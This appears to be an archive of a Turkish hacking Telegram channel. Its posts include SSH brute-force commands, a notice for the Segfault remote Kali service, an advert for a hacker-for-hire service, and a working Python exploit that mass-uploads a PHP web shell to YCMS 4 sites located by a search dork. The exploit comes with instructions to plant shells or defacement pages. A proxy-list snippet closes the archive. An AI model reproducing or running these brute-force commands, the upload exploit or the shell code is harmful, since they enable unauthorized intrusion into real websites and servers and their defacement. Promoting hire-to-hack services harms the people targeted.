无数据
订阅者
-424 小时
+17 天
+5430 天
帖子存档
𝗦𝗦𝗛 (𝗚𝘂𝘃𝗲𝗻𝗹𝗶 𝗞𝗮𝗯𝘂𝗸) 𝗣𝗲𝗻𝘁𝗲𝘀𝘁𝗶𝗻𝗴 🦐SSH, güvenli olmayan bir ağ üzerinden ağ hizmetlerini güvenli bir şekilde çalıştırmak için kullanılan bir kriptografik ağ protokolüdür. Varsayılan bağlantı noktası 22'dir 🗿
nmap --script ssh-brute -p 22 <target-ip>
nmap --script ssh-auth-methods --script-args="ssh.user=username" -p 22 <target-ip>
nmap --script ssh-* -p 22 <target-ip>
# User enumeration 🎯
msf> use auxiliary/scanner/ssh/ssh_enumusers
# -t: tasks 🎯
hydra -l username -P passwords.txt <target-ip> ssh -t 4
hydra -L usernames.txt -p password <target-ip> ssh -t 4
# Specific ports 🎯
hydra -l username -P passwords.txt -s 2222 <target-ip> ssh -t 4
hydra -l username -P passwords.txt ssh://<target-ip>:2222 -t 4
Hedef sunucu 80 veya 443 portunu açıyorsa, web sitesinin içeriğinden kelime listesi üretip Hydra'yı kullanabilirsiniz 🏹
cewl http://<target-ip> > wordlist.txt𝗦𝘄𝗮𝗿𝗲 𝗧𝘂𝗿𝗸𝗲𝘆 𝗘𝗸𝗶𝗽 𝗔𝗹𝛊𝗺𝗹𝗮𝗿𝛊🌴 Merhaba, @swareturkey 'de ekip alımları başlamıştır. Alanlarında bilgili kişileri aramıza bekliyoruzzz. 🌴 𓁹𓁹𓁹𓁹𓁹𓁹𓁹𓁹𓁹𓁹𓁹𓁹𓁹𓁹𓁹𓁹𓁹 🎃 NOT: Sadece hacking de bilginiz olması gerekmemektedir 🎃 Alımlar: @spyizxa
Repost from DxCH4N
🔓Code obfuscation Nedir?
Kod bulandırma, yazılımın kaynak kodunu veya derlenmiş kodunu, insanlar tarafından okunması ve anlaşılması zor hale getirme işlemidir. Bu teknik, özellikle ters mühendislik (reverse engineering) saldırılarına karşı koruma sağlamak için kullanılır. 🛠️🎯 Kod Bulandırmanın Amaçları: 1. Ters Mühendisliği Zorlaştırmak 🚫 2. Fikri Mülkiyetin Korunması 💡 3. Lisans Kontrolü ve Korsanlığı Önleme ⚖️ 🛠️ Kod Bulandırma Teknikleri:
1. Değişken ve Fonksiyon İsimlerini Değiştirme 🔄 Örneğin:🛡️ Kod Bulandırma Araçları:toplama(a, b)yerinex1y2(z3, w4)gibi anlamsız isimler kullanmak. 2. Kod Yapısını Karıştırma 🌀 Döngüler ve koşul ifadelerini karmaşık hale getirerek kodun takip edilmesini zorlaştırmak. 3. String ve Verileri Şifreleme 🔒 Metinleri şifreleyip, sadece çalışma zamanında çözmek. 4. Gereksiz Kod Ekleme ➕ Hiç kullanılmayan değişkenler veya fonksiyonlar ekleyerek kodu karmaşık hale getirmek.
- JavaScript: UglifyJS, JavaScript Obfuscator - Java: ProGuard, Allatori - C#: Dotfuscator, ConfuserEx - Python: PyArmor, pyobfuscate⚖️ Avantajlar ve Dezavantajlar:
✅ Avantajlar: - Ters mühendislik saldırılarına karşı koruma. - Fikri mülkiyetin korunması. ❌ Dezavantajlar: - Kodun bakımı ve hata ayıklaması zorlaşır. - Aşırı karmaşık bulandırma, performansı olumsuz etkileyebilir.🚀 Örnek: Python'da Kod Bulandırma
# Orijinal Kod:
def hesapla(a, b):
return a + b
# Bulandırılmış Kod:
def x1y2(z3, w4):
return z3 + w4
@dxch4nRepost from DxCH4N
Segfault 🔗
(Ücretsiz Remote Kali Linux)
Segfault, ücretsiz ve sınırsız Kali Linux sunucuları sağlar. Her SSH bağlantısında, size özel bir sanal makine oluşturulur. Böylece uzaktan güvenli ve izole bir Kali sistemi kullanabilirsiniz.
Segfault'un Avantajları:
📍Önceden yapılandırılmış onion web sunucusu 📍Kali-Linux'ta kurulu hazır araçlar 📍Giden trafik NordVPN, CryptoStorm veya Mullvad üzerinden yönlendirilir 📍Genel bir IP üzerinden ters TCP/UDP port desteğiSSH ile Bağlantı Komut:
ssh root@segfault.net # Şifre: segfault
Web Panel ile Bağlantı
Giriş:
https://shell.segfault.net/İlk girişte:
* Sistem sizi 60 saniye bekletecek. * Ardından bir tuşa basarak işlemi onaylayın. * Size bir SECRET ve config dosyası verilecek. Bunları kaydedin, böylece oturumunuza kalıcı olarak erişebilirsiniz.Not: İlk kayıt için örnek bir SSH oturumu resimde verilmiştir. @dxch4n
Repost from Umbrella Corp
Umbrella _Corp Kiralık Dijital Korsanlık Hizmeti
Herkesin söylemeye cesaret edemediği şeyleri yapıyoruz. Herkesin ulaşamadığı bilgilere erişiyor, dokunamadığı kapıları açıyoruz. Sizin adınıza, sizin için, sizin yerinize... Dijital ortamda en kirli gayri resmi niyetlerinizi siz güvenli ve elinizi pisliğe bulamadan arkaplanda biz gerçekleştiriyoruz.
Bilgi savaşları mı? Rakibinizin sırlarını sizin için ele geçiriyoruz.
İtibar mı çöktürmek istiyorsunuz? Medyada asla silinemeyecek izler bırakıyoruz.
Birini hacklemek? Hiçbir iz bırakmadan, hiçbir soru işareti olmadan.
Dijital dünyada bir hayalet mi arıyorsunuz? Biz o hayaletiz.
Umbrella _Corp olarak, uzun zamandır Türkiye'de ilki yapıyoruz. Müşterilerimizin kimliği bizim için bir sır, işlerimiz ise asla konuşulmuyor. Çünkü biz, Konuşulmayan Tuğlaların İşçileriyiz.
İletişim:
Sadece güvenilir kanallar üzerinden. Kimliğiniz ise gizli.
DarkWeb Portalı: http://hape46tuf6sci4nxqjhyr5nulqlnz2p33slnhctd7gqfmhkyqqnpb4yd.onion/index.html
E-posta: umbrellacorpcontact@proton.me
Telegram: https://t.me/umbrellacorphackingservice
Unutmayın: bu dünyada her şey mübah. Yeter ki doğru ellere emanet edin.
𝗦𝗢𝗦𝗬𝗔𝗟 𝗠𝗘𝗗𝗬𝗔 𝗛𝗘𝗦𝗔𝗣𝗟𝗔𝗥𝗜𝗠𝗜𝗭#𝐬𝐰𝐚𝐫𝐞 🔗 𝗧𝗲𝗹𝗲𝗴𝗿𝗮𝗺 🔗 𝗜̇𝗻𝘀𝘁𝗮𝗴𝗿𝗮𝗺 #𝐬𝐰𝐚𝐫𝐞 🔗 𝗫 (𝗧𝘄𝗶𝘁𝘁𝗲𝗿) #𝐬𝐰𝐚𝐫𝐞 #𝐬𝐰𝐚𝐫𝐞 🔗 𝗥𝗲𝗱𝗱𝗶𝘁 🔗 𝗗𝗶𝘀𝗰𝗼𝗿𝗱 #𝐬𝐰𝐚𝐫𝐞 𝗣𝗠: @spyizxa
Script Kiddie’nin Büyük Hack’i
Genç bir hacker olan Arda, bir gün büyük bir bankayı hacklemeye karar verdi. Ama gerçek bir hacker gibi uğraşmak yerine, internette bulduğu “bankahack.py” adlı şüpheli bir Python scriptini çalıştırmaya karar verdi.
Komutu yazdı:
python3 bankahack.py
Birden ekranda kırmızı harflerle yazılar akmaya başladı:
"BANKA SİSTEMLERİNE SIZILIYOR..."
"BÜTÜN HESAPLAR ELE GEÇİRİLİYOR..."
Arda heyecanla beklerken ekran aniden karardı. Bilgisayar yeniden başladı ve bir mesaj belirdi:
"Tebrikler! Kendi bilgisayarını hackledin. Tüm dosyaların şifrelendi. Fidye için 1 Bitcoin gönder!"
Arda’nın suratındaki heyecan yerini panik ve pişmanlığa bıraktı. İşte o gün, internette bulduğu her scripti çalıştırmamayı öğrendi...𝘄𝗲𝗯𝗰𝗼𝗽𝗶𝗹𝗼𝘁 🤡Alt alan adlarını sıralayan, daha sonra xss, sqli, open redirect, lfi, ssrf ve rce parametrelerini filtreleyen ve daha sonra güvenlik açıklarını tarayan bir otomasyon aracı.
git clone https://github.com/h4r5h1t/webcopilot && cd webcopilot/ && chmod +x webcopilot install.sh && mv webcopilot /usr/bin/ && ./install.shSelam dostlar isminizin yanına
#sware alarak tag'ımıza katılabilirsiniz. Yakında daha güzel içerikler ve yeni araçlar gelicek 👁✅ Dorksearch.com, Google Dork'larıyla web açıklarını keşfetmek ve bilgi toplamak için yararlı bir araç.
🔗 Link: https://dorksearch.com/
Repost from N/a
𝗜𝘀𝗿𝗮𝗲𝗹 𝗬𝗖𝗠𝗦 4 - 𝗥𝗘𝗠𝗢𝗧𝗘 𝗙𝗜𝗟𝗘 𝗨𝗣𝗟𝗢𝗔𝗗 / 𝗦𝗛𝗘𝗟𝗟 𝗨𝗣𝗟𝗢𝗔𝗗 🎃Merhaba dostlar bugün ilgimi çektiği için bir zafiyet paylaşıcam başlıktan anlarsınız zaten umarım sizinde ilginizi çeker 😁 İlk önce hedef bulmamız lazım DORK kullanarak bulucaz.
Dork: intext:נבנה ע"י לק"י בניית אתרים
Çıkan sonuçları site.txt adlı bir dosya oluşturup kaydediyoruz 🕸
𝗘𝗫𝗣𝗟𝗢𝗜𝗧 𝗘𝗗𝗘𝗟𝗜𝗠 🕷
import requests
import re
from colorama import *
import os
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
init()
code_up = """
<!DOCTYPE html>
<html>
<head>
<title>1933-SS</title>
<style>
body {
background-color: black;
text-align: center;
}
h1 {
color: red;
}
.uploaded {
color: green;
}
</style>
</head>
<body>
<h1>1933-ss cyber team</h1>
<form enctype='multipart/form-data' action='' method='POST'>
<input type='file' name='uploaded_file'></input>
<input type='submit' value='Upload'></input>
</form>
</body>
</html>
<?php
if (!empty($_FILES['uploaded_file'])) {
$upload_dir = './'; // Define the directory where you want to save the uploaded files
$file_name = basename($_FILES['uploaded_file']['name']);
$file_path = $upload_dir . $file_name;
if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $file_path)) {
echo '<span class="uploaded">The file ' . $file_name . ' has been uploaded.</span>';
} else {
echo '<h1>There was an error uploading the file, please try again.</h1>';
}
}
?>
"""
banner = Fore.CYAN +"""
_____ _____ _______ ______ ______ _____ _______ ______ __ __
/ ____/ ____| / ____\ \ / | _ \| ____| __ \ |__ __| ____| /\ | \/ |
| (___| (___ | | \ \_/ /| |_) | |__ | |__) | | | | |__ / \ | \ / |
\___ \\\___ \ | | \ / | _ <| __| | _ / | | | __| / /\ \ | |\/| |
____) ____) | | |____ | | | |_) | |____| | \ \ | | | |____ / ____ \| | | |
|_____|_____/ \_____| |_| |____/|______|_| \_\ |_| |______/_/ \_|_| |_|
"""
banner2 = "\nCoded by :" + Fore.RED +""" T.ME/D4LGH4CK_TM | T.ME/SS_CYBER_TEAM"""
print(banner+banner2+Fore.WHITE)
websites = input("\nwebsite list: ")
websites = open(websites,"r").read().split("\n")
for url in websites:
try:
value = "yadmin/apps/browser.php?op=gallery&CKEditor=page-content&CKEditorFuncNum=1&langCode=en"
upload_url = url+'/yadmin/apps/browser.php?op=upload&type=other&id=*'
uploader = {'upload-to-gallery[]': ('ss.php',code_up)}
response = requests.post(upload_url, files=uploader , timeout=3)
except:
pass
try:
response = requests.get(url+value,timeout=10)
if response.status_code == 200:
match = re.search(r'/ss(\d+\.php)', response.text)
if match:
value = match.group(1)
print(Fore.GREEN +url+f"uploads/other/ss{value}")
else:
print(Fore.RED+f"Request to {url} failed with status code {response.status_code}"+Fore.WHITE)
except:
continue
Kaydedelim ve çalıştıralım, dosya yolunu girelim.
Upload sayfası yüklenmiş olanlara shell/index atabilirsiniz. ☘
[-] Title : israel YCMS 4 - Remote File Upload - CSRF / Shell Upload[-] Author : 1933 (TURK TM - SS CYBER)[-] Vendor : https://website.laki.co.il/[-] Category : Webapps[-] Dork : intext:נבנה ע"י לק"י בניית אתרים[-] Date : 20/11/2023https://cxsecurity.com/issue/WLB-2023110032 Shared or forward 🌹 @swareturkey #swareturkey #swareturkey #swareturkey
Repost from M Ü H Ü R
API_LIST = [
"https://api.proxyscrape.com/v2/?request=displayproxies&protocol=http&timeout=10000&country=all&ssl=all&anonymity=all",
"https://www.proxy-list.download/api/v1/get?type=https",
"https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/http.txt",
"https://www.proxyscan.io/download?type=http",
"https://api.openproxylist.xyz/http.txt"
]